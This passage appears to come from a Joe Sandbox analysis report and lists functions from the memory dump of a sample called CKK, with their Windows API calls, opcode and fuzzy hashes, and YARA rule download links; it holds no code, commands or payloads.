                                          • Instruction ID: f17930a8099cba36ff5f834a769c489e17097516d9d3bf99dea1af598bdd60a9
                                          • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                          • Instruction Fuzzy Hash: 8A812871B00706DBE724AF68DC41B6B73E9AF41368F24A53EF559F6281E7B0D9008B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E9F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCopy$AllocInitString
                                          • String ID:
                                          • API String ID: 3859894641-0
                                          • Opcode ID: 62059b90202953d415ed9a807059ea7066202e0ccbcaa05ebc5c4b30746c2d52
                                          • Instruction ID: 450ec3434c5eb298e56546a3b199cca0c54bc77d5d0353a92994bf83758c2b8b
                                          • Opcode Fuzzy Hash: 62059b90202953d415ed9a807059ea7066202e0ccbcaa05ebc5c4b30746c2d52
                                          • Instruction Fuzzy Hash: EA51B531600310BACF24ABA5D895B69B3E9EF85324B24A467E905FF296DB70CC40C796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00EB94E5
                                          • _wcslen.LIBCMT ref: 00EB9506
                                          • _wcslen.LIBCMT ref: 00EB952D
                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00EB9585
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$FileName$OpenSave
                                          • String ID: X
                                          • API String ID: 83654149-3081909835
                                          • Opcode ID: 869b365df4d7cd3e1118c33bf822e541b25c78226f19c2b3a344237b6dc84e8a
                                          • Instruction ID: a8b149f197423e1622a18e378fd52fbbdf8282cc479f183d2801d30be547167d
                                          • Opcode Fuzzy Hash: 869b365df4d7cd3e1118c33bf822e541b25c78226f19c2b3a344237b6dc84e8a
                                          • Instruction Fuzzy Hash: 12E1B0319083008FD724DF24D881AABB7E5FF85314F14996DF999AB2A2DB31DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • BeginPaint.USER32(?,?), ref: 00E59241
                                          • GetWindowRect.USER32(?,?), ref: 00E592A5
                                          • ScreenToClient.USER32(?,?), ref: 00E592C2
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E592D3
                                          • EndPaint.USER32(?,?), ref: 00E59321
                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E971EA
                                            • Part of subcall function 00E59339: BeginPath.GDI32 ref: 00E59357
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                          • String ID:
                                          • API String ID: 3050599898-0
                                          • Opcode ID: 1d4294e9c280fa81eab6007ceb2fee3f67e1a92403cadfb7d4d0faf6bb3427b0
                                          • Instruction ID: 363ff46f6508d0a2aa9bcec269e5d88ed3cf95727aefe36ff468b5f91a2d2ae4
                                          • Opcode Fuzzy Hash: 1d4294e9c280fa81eab6007ceb2fee3f67e1a92403cadfb7d4d0faf6bb3427b0
                                          • Instruction Fuzzy Hash: B741AD30105201EFDB10DF25DC84FEA7BF8FB55765F140629FAA4A72A2C7309849EB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EB080C
                                          • ReadFile.KERNEL32 ref: 00EB0847
                                          • EnterCriticalSection.KERNEL32(?), ref: 00EB0863
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EB08DC
                                          • ReadFile.KERNEL32 ref: 00EB08F3
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB0921
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3368777196-0
                                          • Opcode ID: 2fcd348d3b130377eb0eab84478df72b4123e8e1f86c5b06a84195fb938df8a4
                                          • Instruction ID: 919511a540d3421a9d999c9b1631059f5ae623144fd60fbbfea01912a914a7d7
                                          • Opcode Fuzzy Hash: 2fcd348d3b130377eb0eab84478df72b4123e8e1f86c5b06a84195fb938df8a4
                                          • Instruction Fuzzy Hash: 35417A71900206EFDF14AF54DC85AAB77B8FF44310F1440A9ED04AA2A7DB30EE65DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00ED824C
                                          • EnableWindow.USER32(00000000,00000000), ref: 00ED8272
                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00ED82D1
                                          • ShowWindow.USER32(00000000,00000004), ref: 00ED82E5
                                          • EnableWindow.USER32(00000000,00000001), ref: 00ED830B
                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00ED832F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 5af9e2be6c5f94a45134bcf6d52339766a769359a7f7043a88eb9d773b467daf
                                          • Instruction ID: a6b0b1a890bb936de5b01c693d9173578348a4f21f391a5632a78022a34eab7e
                                          • Opcode Fuzzy Hash: 5af9e2be6c5f94a45134bcf6d52339766a769359a7f7043a88eb9d773b467daf
                                          • Instruction Fuzzy Hash: 1D41C634601644EFDB11CF25DE95BE47BF0FB06718F19626AE6586B3B2CB319846CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00EA4C95
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EA4CB2
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EA4CEA
                                          • _wcslen.LIBCMT ref: 00EA4D08
                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00EA4D10
                                          • _wcsstr.LIBVCRUNTIME ref: 00EA4D1A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                          • String ID:
                                          • API String ID: 72514467-0
                                          • Opcode ID: 0d6001b61c0edda3fa8f9e9c9e5deb0f10f1cc227dec6e00c004cb9fb51ff51d
                                          • Instruction ID: faf10d4f2e7820a5b406741725f825797ec148135719de54c3c35dec55a70770
                                          • Opcode Fuzzy Hash: 0d6001b61c0edda3fa8f9e9c9e5deb0f10f1cc227dec6e00c004cb9fb51ff51d
                                          • Instruction Fuzzy Hash: 262107B16052017BEB155B39AC0AE7B7BDCDF8A760F10502AF809EE1D1DEA1EC00C2A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                          • _wcslen.LIBCMT ref: 00EB587B
                                          • CoInitialize.OLE32 ref: 00EB5995
                                          • CoCreateInstance.OLE32 ref: 00EB59AE
                                          • CoUninitialize.OLE32 ref: 00EB59CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 3172280962-24824748
                                          • Opcode ID: cf30eff35cfb344b81d1ca51b5ddf31d0d981713cc1ccf01e2524fdede9dd7e8
                                          • Instruction ID: efc111af340f888dc017c464b0ad053b320e9fe2f8cf764c41d62032c8b0cebb
                                          • Opcode Fuzzy Hash: cf30eff35cfb344b81d1ca51b5ddf31d0d981713cc1ccf01e2524fdede9dd7e8
                                          • Instruction Fuzzy Hash: 0ED16472A087019FC714DF24C480A6BBBE1EF89714F14985DF899AB361DB31EC45CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA0FB4: GetTokenInformation.ADVAPI32 ref: 00EA0FCA
                                            • Part of subcall function 00EA0FB4: GetLastError.KERNEL32 ref: 00EA0FD6
                                            • Part of subcall function 00EA0FB4: GetProcessHeap.KERNEL32 ref: 00EA0FE5
                                            • Part of subcall function 00EA0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EA0FEC
                                            • Part of subcall function 00EA0FB4: GetTokenInformation.ADVAPI32 ref: 00EA1002
                                          • GetLengthSid.ADVAPI32(?,00000000,00EA1335), ref: 00EA17AE
                                          • GetProcessHeap.KERNEL32 ref: 00EA17BA
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA17C1
                                          • CopySid.ADVAPI32 ref: 00EA17DA
                                          • GetProcessHeap.KERNEL32 ref: 00EA17EE
                                          • HeapFree.KERNEL32(00000000), ref: 00EA17F5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                          • String ID:
                                          • API String ID: 3008561057-0
                                          • Opcode ID: 45b086bf88dcee8625e626b7714ca2d0df3268a492d03d8667c4b993e6b22f59
                                          • Instruction ID: a730db22cb49a51665b7ba171a6345e474ba00baf55a3c1d29c21ab1d3978dc5
                                          • Opcode Fuzzy Hash: 45b086bf88dcee8625e626b7714ca2d0df3268a492d03d8667c4b993e6b22f59
                                          • Instruction Fuzzy Hash: 9611E131506206FFDB108FA4DC48FAE7BB8EB4B359F20605AF441BB150C731A944CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EA14FF
                                          • OpenProcessToken.ADVAPI32 ref: 00EA1506
                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EA1515
                                          • CloseHandle.KERNEL32(00000004), ref: 00EA1520
                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EA154F
                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EA1563
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                          • String ID:
                                          • API String ID: 1413079979-0
                                          • Opcode ID: d281599537196fea392ca71bbfa90361465db7c896bcb64a770b1d4a394fb1f9
                                          • Instruction ID: 620e614c07e9cd8a24927c0a678fab361a2a417e3a727b7359f4ee3fe8221be6
                                          • Opcode Fuzzy Hash: d281599537196fea392ca71bbfa90361465db7c896bcb64a770b1d4a394fb1f9
                                          • Instruction Fuzzy Hash: 1D11897250120AAFDF118FA8ED09BDE3BA9EF49748F144056FA05B60A0C371DE64DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E63382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32 ref: 00E63390
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E6339E
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E633B7
                                          • SetLastError.KERNEL32(00000000,?,00E63379,00E62FE5), ref: 00E63409
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 14847ae54daa1f088471dde6affeabbdac01ee85e24f91b95f588df06a4f45ca
                                          • Instruction ID: e02629d24045e691c59801bcf201368607c2b4cbedd1fa2aec1a85c3f1efa03f
                                          • Opcode Fuzzy Hash: 14847ae54daa1f088471dde6affeabbdac01ee85e24f91b95f588df06a4f45ca
                                          • Instruction Fuzzy Hash: 7E01D4326C9312BEEA252775BC8556B2E94EB157F9720232AF520F12F0EF114E16A584
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32 ref: 00E72D78
                                          • _free.LIBCMT ref: 00E72DAB
                                          • _free.LIBCMT ref: 00E72DD3
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DE0
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,00E6E6D1,?,00F08A48,00000010,00E44F4A,?,?,00000000,00E83CD6), ref: 00E72DEC
                                          • _abort.LIBCMT ref: 00E72DF2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: f8602d14bd92ebdad4a61c8b89eb7576827ad0559092ce5e82a2d9625ba722db
                                          • Instruction ID: f4f44b87e7a7f2cad65053029bfcf22b073f2c3f642cc767a77613655dc20213
                                          • Opcode Fuzzy Hash: f8602d14bd92ebdad4a61c8b89eb7576827ad0559092ce5e82a2d9625ba722db
                                          • Instruction Fuzzy Hash: F1F028319056013BC6322339BC06E5A26A9AFC17A4F34E11DFB2CB21E6EF2088825260
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59639: ExtCreatePen.GDI32 ref: 00E59693
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596A2
                                            • Part of subcall function 00E59639: BeginPath.GDI32 ref: 00E596B9
                                            • Part of subcall function 00E59639: SelectObject.GDI32 ref: 00E596E2
                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00ED8A4E
                                          • LineTo.GDI32(?,00000003,00000000), ref: 00ED8A62
                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00ED8A70
                                          • LineTo.GDI32(?,00000000,00000003), ref: 00ED8A80
                                          • EndPath.GDI32 ref: 00ED8A90
                                          • StrokePath.GDI32(?), ref: 00ED8AA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: 92811e0ce3a2b15a05f74afbbe62621b5e33b1af4d5697fa722a79b229afbf88
                                          • Instruction ID: 3d8d872bbe340496467df8325d04dcae833a2bf500abad9110ff38416d0d15c4
                                          • Opcode Fuzzy Hash: 92811e0ce3a2b15a05f74afbbe62621b5e33b1af4d5697fa722a79b229afbf88
                                          • Instruction Fuzzy Hash: 9511097600114DFFDF129F91EC88EEA7F6CEB08394F108012BA19AA1A1C7719D59DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00EA5218
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EA5229
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA5230
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00EA5238
                                          • MulDiv.KERNEL32 ref: 00EA524F
                                          • MulDiv.KERNEL32 ref: 00EA5261
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 7e6cacf4d2f4e7872cb65bbdbaceb291baddaf895ab6bb396414af7fcd189048
                                          • Instruction ID: 5ee6e5e43251f6c8ee21dd1dbc540f1468e018313bd64d945987c263a9ebe22b
                                          • Opcode Fuzzy Hash: 7e6cacf4d2f4e7872cb65bbdbaceb291baddaf895ab6bb396414af7fcd189048
                                          • Instruction Fuzzy Hash: 49018F75A01719BFEB109BA69C49B4EBFB8EF48751F144066FA04BB290D6709804CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostMessageW.USER32 ref: 00EAEB30
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EAEB46
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00EAEB55
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00EAEB64
                                          • TerminateProcess.KERNEL32 ref: 00EAEB6E
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAEB75
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: e4268b1669d5fc7ef357529e9ed540a846981f4a7a119c641700315fedf604ac
                                          • Instruction ID: 150cd661603dbfd7cf676f9841ff766ae6dbcb98c4eb4d3ad65efa942c1276ed
                                          • Opcode Fuzzy Hash: e4268b1669d5fc7ef357529e9ed540a846981f4a7a119c641700315fedf604ac
                                          • Instruction Fuzzy Hash: CFF06D72142129BFEA205B53AC0DEAF3B7CEBCAF51F10015AF611E109097A05A05C6B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E97439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32 ref: 00E97452
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E97469
                                          • GetWindowDC.USER32(?), ref: 00E97475
                                          • GetPixel.GDI32(00000000,?,?), ref: 00E97484
                                          • ReleaseDC.USER32(?,00000000), ref: 00E97496
                                          • GetSysColor.USER32 ref: 00E974B0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
